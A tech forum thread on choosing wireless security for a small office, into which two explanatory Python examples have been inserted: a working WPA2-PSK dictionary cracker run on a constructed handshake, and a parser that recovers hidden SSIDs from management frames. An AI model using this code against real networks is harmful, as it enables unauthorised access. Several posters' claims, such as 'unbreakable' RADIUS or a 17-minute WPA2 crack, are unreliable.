Solved

Wireless security settings

Posted on 2010-09-15
Last Modified: 2013-12-27
We are in the process of looking into creating wireless access points on our network for 40 computers.  Can anyone provide advice as to the most appropriate wireless security settings and/or explain the pros and cons of the different options?
Question by:DHPBilcare
17 Comments
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33686347
WPA2 is strongest; having an authentication service like RADIUS is best, but a pre-shared key also works well.  WEP can be cracked in a matter of seconds.  For 40 hosts I recommend having multiple lightweight APs with a controller (Cisco and others offer these) so the hosts don't cross-talk and the load can be distributed.  I would also not broadcast your SSID.  Does this help you?

Author Comment

by:DHPBilcare
ID: 33686440
It does, thanks for the comment.  I am moving towards WPA2 with a shared key.

What would I need for RADIUS?  Would I need a dedicated server?

Expert Comment

by:dusty_it
ID: 33686449
When designing a wireless network there are many other parameters you have to take into account, not only security. Please review your needs in terms of bandwidth per computer and where the computers are located (blind spots, walls, etc.).

Talking about wireless security, you should choose WPA or WPA2 (better) with a long passphrase. WPA is vulnerable only to brute-force dictionary attacks; if you choose a passphrase of, let's say, 30 characters (with digits and mixed uppercase and lowercase letters), your network should be sufficiently secured.
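The dictionary-attack exposure described in the comment above, worked through in Python as an added example (this is not code from the thread or from any poster). It derives the WPA2-PSK key hierarchy the way IEEE 802.11i specifies it and runs a small wordlist against a constructed handshake capture: the SSID, MAC addresses, nonces and EAPOL frame are made up, and the "captured" MIC is computed from the assumed passphrase so the attack has something to verify its guesses against. Two things the derivation makes visible: the SSID is the PBKDF2 salt, and a client sends it in the clear in its association request, so hiding it does not slow this attack down; and every station's PTK is different, but on a PSK network it is computed from the shared PMK plus MACs and nonces that are also in the clear, so one recovered passphrase decrypts every station.

```python
"""WPA2-PSK offline dictionary attack against a captured four-way handshake.

Added example, not code from the original thread. All inputs are constructed:
the SSID, MAC addresses, nonces and EAPOL frame are made up, and the "captured"
MIC is produced here from the assumed passphrase so the attack has something to
check its guesses against. Standard library only.
"""
import hashlib
import hmac
import math
from typing import Dict, Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK mapping: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).

    The SSID is the salt, so precomputed tables exist per common SSID, and a
    hidden SSID buys nothing here: the attacker reads it from the client's
    association request.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: PTK = PRF(PMK, "Pairwise key expansion", MACs || nonces).

    Both MACs and both nonces feed the PRF, so every station derives a different
    PTK from the same PMK. On a PSK network that does not stop an attacker who
    knows the PSK: the MACs and nonces are sent in the clear in the handshake.
    """
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Message 2 MIC for WPA2/CCMP: HMAC-SHA1 over the frame with its MIC field zeroed, cut to 16 bytes.

    The MIC field starts at offset 81: 4-byte EAPOL header + 77 bytes of key
    descriptor (type 1, key info 2, key length 2, replay counter 8, nonce 32,
    IV 16, RSC 8, key ID 8) before it.
    """
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(capture: Dict[str, object], wordlist: Iterable[str]) -> Optional[str]:
    """For each guess: PBKDF2 -> PRF-512 -> KCK (first 16 bytes of PTK) -> MIC, compared to the captured MIC."""
    for guess in wordlist:
        pmk = pmk_from_passphrase(guess, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return guess
    return None


def constructed_capture(passphrase: str, ssid: str = "CorpWiFi") -> Dict[str, object]:
    """What a sniffer hands us from message 2 of the handshake. Constructed, not a real capture."""
    ap_mac = bytes.fromhex("001122334455")    # made-up addresses
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = bytes(range(32))                 # made-up nonces, fixed so the run is reproducible
    snonce = bytes(range(32, 64))
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN element
    body = (b"\x02\x01\x0a"                   # descriptor type 2 (RSN); key info: pairwise | MIC, HMAC-SHA1
            + b"\x00\x00"                     # key length (0 in message 2)
            + (1).to_bytes(8, "big")          # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key ID
            + b"\x00" * 16                    # MIC placeholder
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    eapol = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type 3 (EAPOL-Key)
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    mic = eapol_mic(ptk[:16], eapol)
    eapol = eapol[:81] + mic + eapol[97:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


def keyspace_bits(length: int, alphabet_size: int = 62) -> float:
    """Entropy of a uniformly random passphrase; 30 mixed-case alphanumerics is about 178 bits."""
    return length * math.log2(alphabet_size)


WORDLIST = ["password", "Welcome2010", "letmein", "CorpWiFi123"]   # constructed, deliberately tiny

if __name__ == "__main__":
    weak = constructed_capture("Welcome2010")
    print("weak PSK recovered:  ", crack(weak, WORDLIST))
    strong = constructed_capture("q7T#mP2vL9xR4wZk8nB3yH6jF0cD5gA1")
    print("strong PSK recovered:", crack(strong, WORDLIST))
    print(f"30-char random passphrase keyspace: 2^{keyspace_bits(30):.0f}")
```

Each guess costs 4096 HMAC-SHA1 iterations, which is the only thing standing between a captured handshake and the passphrase; that is the same computation aircrack-ng and hashcat perform, just much faster. Length and randomness of the passphrase, not the SSID setting, decide whether the wordlist ever lands on it.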
 
LVL 1

Expert Comment

by:Robert Davis
ID: 33686474
Yes, you would need a dedicated server that would handle logins for each user, which RADIUS then uses to encrypt the traffic.  It is much more involved and more maintenance as well.  A good long WPA2 PSK with a good SSID that isn't broadcasting is bulletproof enough.  With any security, if someone wants in badly enough, no amount of security will stop them.

My concern would be how close to each other those 40 hosts are and how many APs in what locations you have, rather than the encryption.  Encryption can be changed fairly easily.  You may want to consider a consult for your hardware side if you haven't spent money already...
LVL 1

Expert Comment

by:Robert Davis
ID: 33686488
Or just go with a much cheaper wired solution, if possible.
LVL 12

Accepted Solution

by:naykam (earned 2000 total points)
ID: 33688576
I would strongly recommend WPA2 enterprise using certificates and RADIUS authentication.

This is the ideal scenario. If you have an Active Directory, it could seamlessly integrate the wireless credentials into the user accounts.

Further to that, the use of certificates would make it just that more secure. There is a lot of documentation online in regards to 'wireless AD authentication / wireless radius authentication using IAS or NPS'.

> I am moving towards WPA2 with a shared key.
> What would I need for RADIUS?  Would I need a dedicated server?

The answer is no, you will not need RADIUS for a pre-shared key. Your wireless hardware would support this natively. For WPA2 Enterprise (in a nutshell) you need RADIUS, as it handles the authentication handshakes.

If you go for a pre-shared key, as mentioned, it will be sufficient for most practices. But it really comes down to how secure the rest of your network is. If you secure it with a long and complex (no dictionary words) key, then you can at least say that you 'have tried your hardest'. Hiding the SSID can become a pain in the backside, unless you have group policies that manage the wireless network profile for each computer. Hiding it really doesn't provide any more 'security' on the network, but it does stop random people trying to connect to it and generating a large disallowed log file.

In my opinion, WPA enterprise is the only way to go. It may be a bit more to setup, but data integrity is key.
LVL 1

Expert Comment

by:Robert Davis
ID: 33688842
You can crack WPA when you know the SSID and get a good packet sniff; not broadcasting greatly reduces this chance.  Having to deal with RADIUS, an authentication server/AD and user logins, along with not all hosts/cards supporting Enterprise, has an arguably equal amount of issues compared to typing in an SSID once, or even posting it up on the wall like most datacenters.  We use RADIUS with AD, but I sure as heck don't at home despite the data being just as sensitive.  I just use a MAC filter table and don't broadcast, with a PSK.

It sounds like this network is not very complex, although it would be nice if you'd let us know what you'd like to accomplish.  I'm not trying to shy you away from RADIUS; it's a tried and proven system that a lot of businesses use, with plenty of documentation.  If you want the most security, go RADIUS with LWAPs that have their signal strengths reduced so they don't broadcast outside.  But using a wired solution is MUCH cheaper... then you can use MAC port security to lock down your network from unauthorized users (which you can also do on your wireless controller).  Most users seem to spend a lot of time securing their wireless network, and not their wired.

Let us know what you want to accomplish, the sensitivity of the data you are passing wirelessly, and the reason you want to go wireless.  This will greatly help determine what route is best for you.  Also remember the best security you can apply is on the data itself via SSL, AES, and general safe practices (don't fall for phishing attempts etc.).  The media will always be your weakest point, as media is easy to passively tap, especially over the air.
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33689052
In regards to wireless and security, without a doubt go with Naykam's solution.
You should never, never, never go with anything other than RADIUS/TACACS (AD/directory) authentication, authenticating both computers and users.

Why - because it's unbreakable.

Why not PSK:
- Pre-shared keys leak. You tell 10 people the PSK, and within a couple of weeks someone stopping by the office gets the PSK from one of them because they need wireless, or someone else does.
- When you change the PSK, you need every single user to change it.

With RADIUS, all wireless settings and changes can be controlled through GPOs; every single computer has its own encryption key, and it changes regularly (when using WPA2), so packet sniffing is wasted: you'll never get enough packets to hack the keys.

All other options:
- Hiding SSID
- MAC filters
are just more hassle and false security.
LVL 1

Expert Comment

by:Robert Davis
ID: 33690099
I beg you to argue your point.  Hiding the SSID totally prevents passersby from sniffing from the outside world.  And if you have a packet sniff of the PSK and have the SSID, it's a matter of 17 minutes to crack it; RADIUS is much further behind, but of course crackable.  MAC filters, on the other hand, are a lot safer.  Sure you can spoof... if you know what to spoof.  Coupled with port security in sticky mode, your network is locked down with little effort.  2 minutes of work for exponentially higher security sounds like a good trade-off to me.
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33690358
All legitimate packets sent in a network with a hidden SSID contain the SSID in the header.
Using inSSIDer, or any other free sniffing software, will not tell you the SSID.

Get a real wireless packet sniffer and you can EASILY pick out the hidden SSID.
So much for security --- though it might prevent Brian, 14 years old next door, it will not prevent Brian, 19-year-old "hacker" with the ability to Google...

On what basis can you claim that a WPA2 encryption key is cracked within 17 minutes?
When cracking encryption keys, it's all about getting enough packets, which is easy enough for WEP, where the key doesn't change, or WPA, where all users can share a key.
But with WPA2, every single station has its own key, changing like every 6 minutes -- happy hacking. Will not work, not even on a sunny day!
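Where a hidden SSID actually appears on the air, as an added example (not code from the thread or from any poster). The beacon of an AP with SSID broadcast disabled carries an empty SSID element, but a client that knows the network has to ask for it by name in a directed probe request, and names it again in its association request; both are unencrypted management frames. The parser below walks the tagged information elements of 802.11 management frames and pulls the SSID out of whichever frame carries it. All three frames are constructed here, with made-up MAC addresses and fixed fields, not captured traffic.

```python
"""Recovering a "hidden" SSID from 802.11 management frames.

Added example, not code from the original thread. The frames are constructed
(made-up MAC addresses, fixed fields and information elements), not captured.
"""
from typing import Dict, List, Optional, Tuple

MGMT_HEADER_LEN = 24   # frame control 2, duration 2, addr1 6, addr2 6, addr3 6, sequence control 2
# First frame-control byte: subtype << 4, type bits 00 (management), version 00.
BEACON, PROBE_REQ, ASSOC_REQ = 0x80, 0x40, 0x00
# Fixed fields that precede the tagged IEs: beacon = timestamp 8 + interval 2 + capability 2;
# probe request = none; association request = capability 2 + listen interval 2.
FIXED_LEN = {BEACON: 12, PROBE_REQ: 0, ASSOC_REQ: 4}
SSID_IE = 0


def parse_ies(frame: bytes) -> List[Tuple[int, bytes]]:
    """Walk the tag/length/value list that follows the fixed fields of a management frame."""
    if len(frame) < MGMT_HEADER_LEN or frame[0] & 0x0C != 0:
        raise ValueError("not an 802.11 management frame")
    subtype = frame[0] & 0xF0
    off = MGMT_HEADER_LEN + FIXED_LEN[subtype]
    ies = []
    while off + 2 <= len(frame):
        tag, length = frame[off], frame[off + 1]
        if off + 2 + length > len(frame):
            raise ValueError("truncated information element")
        ies.append((tag, frame[off + 2:off + 2 + length]))
        off += 2 + length
    return ies


def ssid_of(frame: bytes) -> Optional[str]:
    """SSID carried by the frame, or None when absent or blanked (zero-length or all-NUL, the two ways APs hide it)."""
    for tag, value in parse_ies(frame):
        if tag == SSID_IE:
            if not value or value == b"\x00" * len(value):
                return None
            return value.decode("utf-8", "replace")
    return None


def learn_ssids(frames: List[bytes]) -> Dict[str, str]:
    """Map BSSID -> SSID. Beacons give it away when broadcast is on; when it is off,
    the client's association request does. addr3 (bytes 16..22) is the BSSID in both."""
    found: Dict[str, str] = {}
    for frame in frames:
        ssid = ssid_of(frame)
        if ssid is not None and frame[0] & 0xF0 in (BEACON, ASSOC_REQ):
            found[frame[16:22].hex(":")] = ssid
    return found


# ---- constructed sample frames ----
def ie(tag: int, value: bytes) -> bytes:
    return bytes([tag, len(value)]) + value


def mgmt_frame(subtype: int, addr1: bytes, addr2: bytes, addr3: bytes, fixed: bytes, ies: bytes) -> bytes:
    return bytes([subtype, 0x00]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + fixed + ies


BROADCAST = b"\xff" * 6
AP_MAC = bytes.fromhex("001122334455")     # made up
STA_MAC = bytes.fromhex("66778899aabb")    # made up
SSID = b"CorpWiFi"
RATES = ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))

# Beacon with SSID broadcast disabled: the SSID element is present but empty.
HIDDEN_BEACON = mgmt_frame(BEACON, BROADCAST, AP_MAC, AP_MAC,
                           b"\x00" * 8 + b"\x64\x00" + b"\x11\x04", ie(SSID_IE, b"") + RATES)
# A client that knows the hidden network must probe for it by name...
PROBE_REQ_FRAME = mgmt_frame(PROBE_REQ, BROADCAST, STA_MAC, BROADCAST, b"",
                             ie(SSID_IE, SSID) + RATES)
# ...and names it again when it associates.
ASSOC_REQ_FRAME = mgmt_frame(ASSOC_REQ, AP_MAC, STA_MAC, AP_MAC, b"\x11\x04" + b"\x0a\x00",
                             ie(SSID_IE, SSID) + RATES)

if __name__ == "__main__":
    for name, frame in [("hidden beacon", HIDDEN_BEACON),
                        ("probe request", PROBE_REQ_FRAME),
                        ("association request", ASSOC_REQ_FRAME)]:
        print(f"{name:20s} SSID = {ssid_of(frame)!r}")
    print("learned:", learn_ssids([HIDDEN_BEACON, PROBE_REQ_FRAME, ASSOC_REQ_FRAME]))
```

Any monitor-mode capture of a client joining the network gives you these frames; that is why hiding the SSID keeps a network out of casual scan lists but does not keep its name from anyone who is listening when a legitimate user connects.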
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33690364
LVL 1

Expert Comment

by:Robert Davis
ID: 33690431
Indeed, we use AirMagnet in conjunction with Kismet for site surveys.  As said a million times, there's always a way to crack it.  I don't see what your beef is with not broadcasting the SSID or using MAC filtering/port security when it really doesn't take any time to implement and drastically improves network security.  It's easy, for a noticeable gain, end of story.  In my experience Cisco RADIUS solutions and users having weak, forgettable passwords cause way more issues than a forgotten SSID or MAC change.  Just my $0.02.
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33690452
I never said hiding the SSID is wasted,
but it should be used together with RADIUS ---
I might have misunderstood you - I thought you claimed that hiding the SSID and MAC filtering is better than RADIUS -- and of course, that's not the case.

You should always, when securing wireless, start with RADIUS/TACACS; everything else comes as a bonus.
LVL 1

Expert Comment

by:Robert Davis
ID: 33690483
Ah, if you read my first posts, RADIUS is safer.  But for the OP, it kind of comes down to what kind of operation this is and what his experience and budget are.  There are definitely times where PSK is far more practical, despite the increased risk; that's my only other point.  Cost, hardware, drivers and knowledge are a few concerns.
LVL 25

Expert Comment

by:madunix
ID: 33699427
Read this: http://www.linux-magazine.com/w3/issue/119/048-049_kurt.pdf
If you are looking for a cheap and secure wireless router setup, check out Tomato, DD-WRT, or OpenWrt.
LVL 22

Expert Comment

by:Jakob Digranes
ID: 33700573
Still --- I wouldn't recommend anyone deploy anything other than 802.1X-secured wireless in a business environment ---
PSK, hiding the SSID and MAC filtering are less secure and/or high maintenance ...
And 802.1X with Win2008 NPS or Win2003 IAS is fairly easy, and if you skip certificate deployment as well and use only the computer account with user re-authentication, it's, if possible, even easier --


Author Closing Comment

by:DHPBilcare
ID: 33727417
Thanks for the comments.

For us security is key, and our parent company has insisted on RADIUS authentication.  We have asked for an expert to come on site and look at what we will need going forward.